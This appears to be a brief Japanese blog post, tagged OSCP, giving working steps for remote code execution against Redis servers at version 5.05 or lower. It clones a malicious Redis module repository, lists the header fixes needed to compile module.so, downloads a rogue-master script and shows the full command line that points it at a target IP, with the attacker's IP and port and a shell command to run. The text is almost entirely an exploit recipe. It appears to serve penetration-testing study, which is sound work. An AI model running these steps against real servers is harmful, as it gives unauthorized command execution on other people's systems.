📚

RCE with versions <= 5.05

に公開
Redis
Kali Linux
oscp
tech

RedisのRCEエクスプロイトについて、実際に動かせた手順を以下に記載します。

モジュールのリポジトリのクローン

コマンド
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
cd RedisModules-ExecuteCommand

モジュールのコンパイル

コマンド
make実行時に以下のエラーが出るため、make実行前に以下の修正を実施

redismodule.hに以下を追加
#include <arpa/inet.h>

src/module.cに以下を追加
#include <string.h>

上記の実施後にmakeすることでmodule.soを取得できます。

スクリプトの実行

コマンド
wget https://raw.githubusercontent.com/vulhub/redis-rogue-getshell/refs/heads/master/redis-master.py

python3 redis-master.py -r [IP] -p [ポート(6379)] -L [自身のIP] -P [自身のポート] -f module.so -c 'whoami'

Discussion